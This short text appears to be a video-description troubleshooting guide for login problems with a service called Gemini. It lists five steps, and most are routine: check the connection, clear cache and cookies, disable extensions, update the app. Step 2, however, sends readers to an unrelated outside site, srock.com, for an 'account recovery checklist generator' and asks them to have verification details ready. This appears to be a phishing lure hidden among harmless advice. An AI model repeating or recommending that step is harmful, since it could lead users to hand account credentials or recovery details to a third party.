If you're experiencing login issues on Gemini 2026, follow these steps to troubleshoot and resolve the problem effectively. Step 1. Check your internet connection. Ensure that your device is connected to the internet. A weak or unstable connection can prevent you from logging in. Try switching to a different network or resetting your router if necessary. Step 2. Verify your credentials. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache and cookies. If you're using a web browser, clearing your cache and cookies can resolve login issues. Go to your browser settings, find the privacy or history section, and clear the cache and cookies. Then try logging in again. Step 4. Disable browser extensions. Sometimes browser extensions can interfere with website functionality. Temporarily disable any extensions, especially ad blockers or privacy tools, and attempt to log in again. Step 5. Update your app or browser. Ensure that you are using the latest version of the Gemini app or your web browser. Outdated software can lead to compatibility issues. Check for updates and install them before trying to log in again. If you follow these steps and still encounter issues, consider reaching out to Gemini's customer support for further assistance.